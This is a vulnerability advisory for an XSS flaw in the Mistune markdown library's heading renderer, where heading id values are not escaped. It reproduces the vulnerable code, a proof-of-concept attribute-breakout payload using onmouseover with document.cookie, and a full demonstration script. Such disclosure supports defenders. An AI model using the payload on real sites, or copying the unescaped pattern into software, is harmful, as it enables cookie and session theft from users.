PT-2026-39330 · Pypi · Mistune
Published
2026-05-09
·
Updated
2026-05-09
·
CVE-2026-44897
CVSS v3.1
6.1
Medium
| Vector | AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
Summary
HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.The default TOC hook assigns safe auto-incremented IDs (
toc 1, toc 2, …) that never contain user text. However, the add toc hook() API accepts a caller-supplied heading id callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like #installation or #getting-started — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.Details
File:
src/mistune/renderers/html.pydef heading(self, text: str, level: int, **attrs: Any) -> str:
tag = "h" + str(level)
html = "<" + tag
id = attrs.get("id")
if id:
html += ' id="' + id + '"' # ← id is never escaped
return html + ">" + text + "</" + tag + ">
"
The
text body (line content) is escaped upstream by the inline token renderer, which is why text arrives as " etc. But id arrives as a raw string directly from whatever the heading id callback returned — no escaping occurs at any point in the pipeline.PoC
Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with
escape=True and the default add toc hook() (no custom heading id callback). The default hook generates sequential numeric IDs:md safe = create markdown(escape=True)
add toc hook(md safe) # default: heading id produces toc 1, toc 2, …
bl src = "## Introduction
"
bl out, = md safe.parse(bl src)
Output — ID is auto-generated, no user text appears in it:
<h2 id="toc 1">Introduction</h2>
Step 2 — Add the realistic trigger: a text-based
heading id callbackDeriving an anchor ID from the heading text is the standard real-world pattern (slugifiers,
mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:def raw id(token, index):
return token.get("text", "") # returns raw heading text as the ID
md vuln = create markdown(escape=True)
add toc hook(md vuln, heading id=raw id)
Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
## foo" onmouseover="alert(document.cookie)" x="
When
raw id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.Step 4 — Observe attribute breakout in the output
ex src = '## foo" onmouseover="alert(document.cookie)" x="
'
ex out, = md vuln.parse(ex src)
Actual output:
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo" onmouseover="alert(document.cookie)" x="</h2>
Note: the heading body text is correctly escaped (
"), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.Script
A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser.
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create markdown
from mistune.toc import add toc hook
def raw id(token, index):
return token.get("text", "")
# --- baseline ---
md safe = create markdown(escape=True)
add toc hook(md safe)
bl file = "baseline h2.md"
bl src = "## Introduction
"
with open(os.path.join(os.getcwd(), bl file), "w") as f:
f.write(bl src)
bl out, = md safe.parse(bl src)
print(f"[{bl file}]
{bl src}")
print("[output — id=toc 1, no user content, safe]")
print(bl out)
# --- exploit ---
md vuln = create markdown(escape=True)
add toc hook(md vuln, heading id=raw id)
ex file = "exploit h2.md"
ex src = '## foo" onmouseover="alert(document.cookie)" x="
'
with open(os.path.join(os.getcwd(), ex file), "w") as f:
f.write(ex src)
ex out, = md vuln.parse(ex src)
print(f"[{ex file}]
{ex src}")
print("[output — heading id returns raw text, id= not escaped]")
print(ex out)
# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""
def case(kind, label, filename, src, out):
return f"""
<div class="case {kind}">
<div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
<div class="panels">
<div class="panel">
<h3>Input — {h.escape(filename)}</h3>
<pre>{h.escape(src)}</pre>
</div>
<div class="panel">
<h3>Output — HTML source</h3>
<pre>{h.escape(out)}</pre>
<div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
<div class="rendered">{out}</div>
</div>
</div>
</div>"""
page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + id + '"' with no escaping.
Triggered when heading id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc 1, safe", bl file, bl src, bl out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex file, ex src, ex out)}
</body></html>"""
out path = os.path.join(os.getcwd(), "report h2.html")
with open(out path, "w") as f:
f.write(page)
print(f"
[report] {out path}")
Example Usage:
python poc.py
Once the script is run, open
report h2.html in the browser and observe the behaviour.Impact
| Dimension | Assessment |
|---|---|
| Confidentiality | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| Integrity | DOM manipulation, phishing content injection, forced navigation |
| Availability | Page freeze or crash available to attacker |
Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's
heading id callback without independently sanitising the returned value.Fix
XSS
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Mistune